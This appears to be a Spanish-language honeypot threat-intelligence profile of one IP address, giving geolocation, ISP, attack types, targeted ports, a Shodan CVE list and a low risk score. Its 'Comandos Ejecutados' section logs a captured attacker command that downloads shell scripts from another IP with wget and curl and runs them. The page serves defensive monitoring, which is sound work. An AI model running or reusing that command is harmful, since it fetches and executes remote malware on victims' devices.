TROYANOSYVIRUS
Amenaza ActivaBAJO

142.248.80.31

Primera Deteccion12/4/2026
Ultima Actividad14/4/2026
ISPAdvin Services LLC
🎯
28
Ataques Totales
🔌
3
Puertos
📡
3
Tipos Ataque
🦠
0
Malware

Geolocalizacion

Pais
🇺🇸 Estados Unidos
Ciudad
Desconocida
ASN
AS22295
ISP
Advin Services LLC

Tipos de Ataque

adb_honeypot
web_honeypot
tcp_trap

Puertos Atacados

80555517000

Malware Asociado

Sin malware asociado

Comandos Ejecutados

$cd /data/local/tmp/; busybox wget http://142.248.80.144/w.sh; sh w.sh; curl http://142.248.80.144/c.sh; sh c.sh4x
$echo hello1x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
80
Vulnerabilidades
CVE-2013-4365CVE-2024-38473CVE-2025-49812CVE-2024-36387CVE-2024-38475CVE-2025-59775CVE-2023-38709CVE-2007-4723CVE-2024-27316CVE-2012-4360CVE-2025-23048CVE-2024-38474CVE-2025-55753CVE-2024-38477CVE-2013-2765CVE-2012-3526CVE-2025-58098CVE-2024-39573CVE-2024-43394CVE-2024-40898
CPEs
cpe:/a:apache:http_server:2.4.58cpe:/o:canonical:ubuntu_linux

Evaluacion de Riesgo

35
/100
BajoMedioAltoCritico